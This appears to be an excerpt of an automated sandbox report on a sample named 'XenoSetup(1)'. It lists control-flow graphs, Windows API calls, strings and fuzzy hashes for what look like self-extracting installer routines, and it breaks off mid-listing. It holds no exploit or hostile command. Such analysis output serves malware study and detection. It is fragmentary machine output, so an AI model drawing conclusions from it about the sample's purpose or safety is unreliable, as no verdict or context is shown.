                                                                                      • Opcode Fuzzy Hash: 3e412211b8278f9fa2cdfd460f4f0961ed836ccbbcabd4241238b6ff84a42b2b
                                                                                      • Instruction Fuzzy Hash: A33201729002889BDF25EF69DC41BEE77A5FF14320F40011AFA459B291EBB59D84DB50

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00FFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FFB579
                                                                                        • Part of subcall function 00FFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FFB58A
                                                                                        • Part of subcall function 00FFB568: IsDialogMessageW.USER32(00090028,?), ref: 00FFB59E
                                                                                        • Part of subcall function 00FFB568: TranslateMessage.USER32(?), ref: 00FFB5AC
                                                                                        • Part of subcall function 00FFB568: DispatchMessageW.USER32(?), ref: 00FFB5B6
                                                                                      • GetDlgItem.USER32(00000068,0103FCB8), ref: 00FFD4E8
                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00FFAF07,00000001,?,?,00FFB7B9,0101506C,0103FCB8,0103FCB8,00001000,00000000,00000000), ref: 00FFD510
                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FFD51B
                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,010135F4), ref: 00FFD529
                                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FFD53F
                                                                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FFD559
                                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FFD59D
                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FFD5AB
                                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FFD5BA
                                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FFD5E1
                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,010143F4), ref: 00FFD5F0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                      • String ID: \
                                                                                      • API String ID: 3569833718-2967466578
                                                                                      • Opcode ID: 0ceb671e11974097bcc54f1cefd8622fabebf536a21a68975c8feb2e22f97c3c
                                                                                      • Instruction ID: b96fbd8b769bcc9c24df3108cee74c8078d541afb9897b2bee429dece23aec22
                                                                                      • Opcode Fuzzy Hash: 0ceb671e11974097bcc54f1cefd8622fabebf536a21a68975c8feb2e22f97c3c
                                                                                      • Instruction Fuzzy Hash: F63125B5104351AFD331DF20DC8AF6B7FACFF82314F040609F6909A184DBAA89048776

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 836 ffd78f-ffd7a7 call ffec50 839 ffd7ad-ffd7b9 call 1003e13 836->839 840 ffd9e8-ffd9f0 836->840 839->840 843 ffd7bf-ffd7e7 call fffff0 839->843 846 ffd7e9 843->846 847 ffd7f1-ffd7ff 843->847 846->847 848 ffd812-ffd818 847->848 849 ffd801-ffd804 847->849 850 ffd85b-ffd85e 848->850 851 ffd808-ffd80e 849->851 850->851 854 ffd860-ffd866 850->854 852 ffd837-ffd844 851->852 853 ffd810 851->853 856 ffd84a-ffd84e 852->856 857 ffd9c0-ffd9c2 852->857 855 ffd822-ffd82c 853->855 858 ffd86d-ffd86f 854->858 859 ffd868-ffd86b 854->859 860 ffd82e 855->860 861 ffd81a-ffd820 855->861 862 ffd9c6 856->862 863 ffd854-ffd859 856->863 857->862 864 ffd882-ffd898 call feb92d 858->864 865 ffd871-ffd878 858->865 859->858 859->864 860->852 861->855 867 ffd830-ffd833 861->867 870 ffd9cf 862->870 863->850 871 ffd89a-ffd8a7 call ff1fbb 864->871 872 ffd8b1-ffd8bc call fea231 864->872 865->864 868 ffd87a 865->868 867->852 868->864 873 ffd9d6-ffd9d8 870->873 871->872 881 ffd8a9 871->881 882 ffd8be-ffd8d5 call feb6c4 872->882 883 ffd8d9-ffd8e6 ShellExecuteExW 872->883 876 ffd9da-ffd9dc 873->876 877 ffd9e7 873->877 876->877 880 ffd9de-ffd9e1 ShowWindow 876->880 877->840 880->877 881->872 882->883 883->877 885 ffd8ec-ffd8f9 883->885 887 ffd90c-ffd90e 885->887 888 ffd8fb-ffd902 885->888 889 ffd925-ffd944 call ffdc3b 887->889 890 ffd910-ffd919 887->890 888->887 891 ffd904-ffd90a 888->891 892 ffd97b-ffd987 CloseHandle 889->892 905 ffd946-ffd94e 889->905 890->889 899 ffd91b-ffd923 ShowWindow 890->899 891->887 891->892 893 ffd989-ffd996 call ff1fbb 892->893 894 ffd998-ffd9a6 892->894 893->870 893->894 894->873 898 ffd9a8-ffd9aa 894->898 898->873 902 ffd9ac-ffd9b2 898->902 899->889 902->873 904 ffd9b4-ffd9be 902->904 904->873 905->892 906 ffd950-ffd961 GetExitCodeProcess 905->906 906->892 907 ffd963-ffd96d 906->907 908 ffd96f 907->908 909 ffd974 907->909 908->909 909->892
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00FFD7AE
                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00FFD8DE
                                                                                      • ShowWindow.USER32(?,00000000), ref: 00FFD91D
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00FFD959
                                                                                      • CloseHandle.KERNEL32(?), ref: 00FFD97F
                                                                                      • ShowWindow.USER32(?,00000001), ref: 00FFD9E1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                      • String ID: .exe$.inf
                                                                                      • API String ID: 36480843-3750412487
                                                                                      • Opcode ID: 320ac24e9c7a0d9f1a64d4337f23fda9bbf040c2aab9ad5343cff04aeb774c62
                                                                                      • Instruction ID: ac7cf08c0b0a823a6009fe4e632716e0cb74798185b5e57a4a007f7b63362573
                                                                                      • Opcode Fuzzy Hash: 320ac24e9c7a0d9f1a64d4337f23fda9bbf040c2aab9ad5343cff04aeb774c62
                                                                                      • Instruction Fuzzy Hash: 3D51E7718043889ADB319F64D844BBB7BFAAF817A4F04041DF7C1971B4E7B98944EB52

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 910 100a95b-100a974 911 100a976-100a986 call 100ef4c 910->911 912 100a98a-100a98f 910->912 911->912 919 100a988 911->919 914 100a991-100a999 912->914 915 100a99c-100a9c0 MultiByteToWideChar 912->915 914->915 917 100ab53-100ab66 call fffbbc 915->917 918 100a9c6-100a9d2 915->918 920 100a9d4-100a9e5 918->920 921 100aa26 918->921 919->912 924 100aa04-100aa15 call 1008e06 920->924 925 100a9e7-100a9f6 call 1012010 920->925 923 100aa28-100aa2a 921->923 928 100aa30-100aa43 MultiByteToWideChar 923->928 929 100ab48 923->929 924->929 936 100aa1b 924->936 925->929 935 100a9fc-100aa02 925->935 928->929 932 100aa49-100aa5b call 100af6c 928->932 933 100ab4a-100ab51 call 100abc3 929->933 940 100aa60-100aa64 932->940 933->917 939 100aa21-100aa24 935->939 936->939 939->923 940->929 942 100aa6a-100aa71 940->942 943 100aa73-100aa78 942->943 944 100aaab-100aab7 942->944 943->933 947 100aa7e-100aa80 943->947 945 100ab03 944->945 946 100aab9-100aaca 944->946 950 100ab05-100ab07 945->950 948 100aae5-100aaf6 call 1008e06 946->948 949 100aacc-100aadb call 1012010 946->949 947->929 951 100aa86-100aaa0 call 100af6c 947->951 952 100ab41-100ab47 call 100abc3 948->952 966 100aaf8 948->966 949->952 965 100aadd-100aae3 949->965 950->952 953 100ab09-100ab22 call 100af6c 950->953 951->933 963 100aaa6 951->963 952->929 953->952 967 100ab24-100ab2b 953->967 963->929 968 100aafe-100ab01 965->968 966->968 969 100ab67-100ab6d 967->969 970 100ab2d-100ab2e 967->970 968->950 971 100ab2f-100ab3f WideCharToMultiByte 969->971 970->971 971->952 972 100ab6f-100ab76 call 100abc3 971->972 972->933
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,01005695,01005695,?,?,?,0100ABAC,00000001,00000001,2DE85006), ref: 0100A9B5
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0100ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0100AA3B
                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0100AB35
                                                                                      • __freea.LIBCMT ref: 0100AB42
                                                                                        • Part of subcall function 01008E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0100CA2C,00000000,?,01006CBE,?,00000008,?,010091E0,?,?,?), ref: 01008E38
                                                                                      • __freea.LIBCMT ref: 0100AB4B
                                                                                      • __freea.LIBCMT ref: 0100AB70
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1414292761-0
                                                                                      • Opcode ID: 4ee6073a8b0986ad6d9d60ce99fb90d659cbb1435d0a8a22b396f9db9cc74afe
                                                                                      • Instruction ID: d50195120fe247807d7b2d7d457ae2f306fac819a38939f0f106c6c3c22fd7ba
                                                                                      • Opcode Fuzzy Hash: 4ee6073a8b0986ad6d9d60ce99fb90d659cbb1435d0a8a22b396f9db9cc74afe
                                                                                      • Instruction Fuzzy Hash: 5E51A072700716EAFB268E68CC41EBFBBEAEB44650F154A69FD84D71C1DB34DC908690

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 975 1003b72-1003b7c 976 1003bee-1003bf1 975->976 977 1003bf3 976->977 978 1003b7e-1003b8c 976->978 981 1003bf5-1003bf9 977->981 979 1003b95-1003bb1 LoadLibraryExW 978->979 980 1003b8e-1003b91 978->980 984 1003bb3-1003bbc GetLastError 979->984 985 1003bfa-1003c00 979->985 982 1003b93 980->982 983 1003c09-1003c0b 980->983 987 1003beb 982->987 983->981 988 1003be6-1003be9 984->988 989 1003bbe-1003bd3 call 1006088 984->989 985->983 986 1003c02-1003c03 FreeLibrary 985->986 986->983 987->976 988->987 989->988 992 1003bd5-1003be4 LoadLibraryExW 989->992 992->985 992->988
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,01003C35,?,?,01042088,00000000,?,01003D60,00000004,InitializeCriticalSectionEx,01016394,InitializeCriticalSectionEx,00000000), ref: 01003C03
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 3664257935-2084034818
                                                                                      • Opcode ID: ea26fd4bfea4f88e81bc0aca903dfd2a7da7296ff73994dac190d97f0d9d5288
                                                                                      • Instruction ID: 771f94dcc40342c15f04c93738298ff3960a8f609dab574661198e86041b9674
                                                                                      • Opcode Fuzzy Hash: ea26fd4bfea4f88e81bc0aca903dfd2a7da7296ff73994dac190d97f0d9d5288
                                                                                      • Instruction Fuzzy Hash: D011C431A45A25AFEB338A5C9C40B9D3BE4BB01674F1101A0FAD5EF2C4D776E90087D0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 993 fe98e0-fe9901 call ffec50 996 fe990c 993->996 997 fe9903-fe9906 993->997 999 fe990e-fe991f 996->999 997->996 998 fe9908-fe990a 997->998 998->999 1000 fe9927-fe9931 999->1000 1001 fe9921 999->1001 1002 fe9936-fe9943 call fe6edb 1000->1002 1003 fe9933 1000->1003 1001->1000 1006 fe994b-fe996a CreateFileW 1002->1006 1007 fe9945 1002->1007 1003->1002 1008 fe996c-fe998e GetLastError call febb03 1006->1008 1009 fe99bb-fe99bf 1006->1009 1007->1006 1013 fe99c8-fe99cd 1008->1013 1017 fe9990-fe99b3 CreateFileW GetLastError 1008->1017 1011 fe99c3-fe99c6 1009->1011 1011->1013 1014 fe99d9-fe99de 1011->1014 1013->1014 1018 fe99cf 1013->1018 1015 fe99ff-fe9a10 1014->1015 1016 fe99e0-fe99e3 1014->1016 1020 fe9a2e-fe9a39 1015->1020 1021 fe9a12-fe9a2a call ff0602 1015->1021 1016->1015 1019 fe99e5-fe99f9 SetFileTime 1016->1019 1017->1011 1022 fe99b5-fe99b9 1017->1022 1018->1014 1019->1015 1021->1020 1022->1011
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00FE7760,?,00000005,?,00000011), ref: 00FE995F
                                                                                      • GetLastError.KERNEL32(?,?,00FE7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FE996C
                                                                                      • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00FE7760,?,00000005,?), ref: 00FE99A2
                                                                                      • GetLastError.KERNEL32(?,?,00FE7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FE99AA
                                                                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00FE7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FE99F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CreateErrorLast$Time
                                                                                      • String ID:
                                                                                      • API String ID: 1999340476-0
                                                                                      • Opcode ID: da115f1fed81bf411f974015585302fbc02e5c413d03d0cc2bf6c809a656d2e4
                                                                                      • Instruction ID: f8eb080a600f166f4a42e8839aab4ac8258efc16a5eadf52f901a10007da495b
                                                                                      • Opcode Fuzzy Hash: da115f1fed81bf411f974015585302fbc02e5c413d03d0cc2bf6c809a656d2e4
                                                                                      • Instruction Fuzzy Hash: 4631F5309487856FE7309E25CC45BEABBE4BB44330F100B19F9E1961C2D7E99844DBA5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1052 ffb568-ffb581 PeekMessageW 1053 ffb5bc-ffb5be 1052->1053 1054 ffb583-ffb597 GetMessageW 1052->1054 1055 ffb599-ffb5a6 IsDialogMessageW 1054->1055 1056 ffb5a8-ffb5b6 TranslateMessage DispatchMessageW 1054->1056 1055->1053 1055->1056 1056->1053
                                                                                      APIs
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FFB579
                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FFB58A
                                                                                      • IsDialogMessageW.USER32(00090028,?), ref: 00FFB59E
                                                                                      • TranslateMessage.USER32(?), ref: 00FFB5AC
                                                                                      • DispatchMessageW.USER32(?), ref: 00FFB5B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$DialogDispatchPeekTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 1266772231-0
                                                                                      • Opcode ID: 797b3907a945be840ce5da9c6aa7773c4e81bf18f0ab9d0d039bcb5606654e1f
                                                                                      • Instruction ID: 72b48f7761663bf17dcd7cf24a810c353790edc88dc8003a5ef3bd9821e495c9
                                                                                      • Opcode Fuzzy Hash: 797b3907a945be840ce5da9c6aa7773c4e81bf18f0ab9d0d039bcb5606654e1f
                                                                                      • Instruction Fuzzy Hash: 63F030B5E01129AB8B309BE1DD8CDEB7FBCEE053A07044515B545D2018EB3CD505CBB0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1057 ffabab-ffabca GetClassNameW 1058 ffabcc-ffabe1 call ff1fbb 1057->1058 1059 ffabf2-ffabf4 1057->1059 1064 ffabe3-ffabef FindWindowExW 1058->1064 1065 ffabf1 1058->1065 1061 ffabff-ffac01 1059->1061 1062 ffabf6-ffabf9 SHAutoComplete 1059->1062 1062->1061 1064->1065 1065->1059
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000050), ref: 00FFABC2
                                                                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00FFABF9
                                                                                        • Part of subcall function 00FF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FEC116,00000000,.exe,?,?,00000800,?,?,?,00FF8E3C), ref: 00FF1FD1
                                                                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00FFABE9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                      • String ID: EDIT
                                                                                      • API String ID: 4243998846-3080729518
                                                                                      • Opcode ID: 1ec362fde5f601736d60022a9cafe22bbfabad20dccddd1b23aaef077e705dff
                                                                                      • Instruction ID: 2089ca52ecb7187fd64b75ba0b812b403ed51ead88cab498144598fd8b864b10
                                                                                      • Opcode Fuzzy Hash: 1ec362fde5f601736d60022a9cafe22bbfabad20dccddd1b23aaef077e705dff
                                                                                      • Instruction Fuzzy Hash: 62F0E2B2A0022C77DA3096649C0AFAB726CAF82B10F480111BB44E60C4D769D941C6B6

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00FF081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FF0836
                                                                                        • Part of subcall function 00FF081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FEF2D8,Crypt32.dll,00000000,00FEF35C,?,?,00FEF33E,?,?,?), ref: 00FF0858
                                                                                      • OleInitialize.OLE32(00000000), ref: 00FFAC2F
                                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FFAC66
                                                                                      • SHGetMalloc.SHELL32(01028438), ref: 00FFAC70
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                      • String ID: riched20.dll
                                                                                      • API String ID: 3498096277-3360196438
                                                                                      • Opcode ID: 9b0442fae4fdc1bf763c394e67b00f0e5569830f584a84387ecdd25266330853
                                                                                      • Instruction ID: 293fa45a9496d5c40eddb60f59cd4b9d9b865490b3216078e854b53bd92a0579
                                                                                      • Opcode Fuzzy Hash: 9b0442fae4fdc1bf763c394e67b00f0e5569830f584a84387ecdd25266330853
                                                                                      • Instruction Fuzzy Hash: 7AF04FB5D00219ABCB10AFA9D9499AFFBFCFF84700F10415AE541E2215CBB85605CBA1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1070 ffdbde-ffdc09 call ffec50 SetEnvironmentVariableW call ff0371 1074 ffdc0e-ffdc12 1070->1074 1075 ffdc36-ffdc38 1074->1075 1076 ffdc14-ffdc18 1074->1076 1077 ffdc21-ffdc28 call ff048d 1076->1077 1080 ffdc1a-ffdc20 1077->1080 1081 ffdc2a-ffdc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                                                      APIs
                                                                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00FFDBF4
                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FFDC30
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentVariable
                                                                                      • String ID: sfxcmd$sfxpar
                                                                                      • API String ID: 1431749950-3493335439
                                                                                      • Opcode ID: 779412aa92279dad2b3a727a446518aac2e0afa7e02437ec348b27982feb0fe1
                                                                                      • Instruction ID: 84eeb2ae973f70f9224fee1cb0210ed634609bcd3c90301736be5e26fc9c8f06
                                                                                      • Opcode Fuzzy Hash: 779412aa92279dad2b3a727a446518aac2e0afa7e02437ec348b27982feb0fe1
                                                                                      • Instruction Fuzzy Hash: 1EF0ECB240422C67DB211F958C06FFA376DBF05B91B040415BFC59E125E6FC8840E7B0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1082 fe9785-fe9791 1083 fe979e-fe97b5 ReadFile 1082->1083 1084 fe9793-fe979b GetStdHandle 1082->1084 1085 fe97b7-fe97c0 call fe98bc 1083->1085 1086 fe9811 1083->1086 1084->1083 1090 fe97d9-fe97dd 1085->1090 1091 fe97c2-fe97ca 1085->1091 1088 fe9814-fe9817 1086->1088 1093 fe97ee-fe97f2 1090->1093 1094 fe97df-fe97e8 GetLastError 1090->1094 1091->1090 1092 fe97cc 1091->1092 1095 fe97cd-fe97d7 call fe9785 1092->1095 1097 fe980c-fe980f 1093->1097 1098 fe97f4-fe97fc 1093->1098 1094->1093 1096 fe97ea-fe97ec 1094->1096 1095->1088 1096->1088 1097->1088 1098->1097 1100 fe97fe-fe9807 GetLastError 1098->1100 1100->1097 1101 fe9809-fe980a 1100->1101 1101->1095
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00FE9795
                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00FE97AD
                                                                                      • GetLastError.KERNEL32 ref: 00FE97DF
                                                                                      • GetLastError.KERNEL32 ref: 00FE97FE
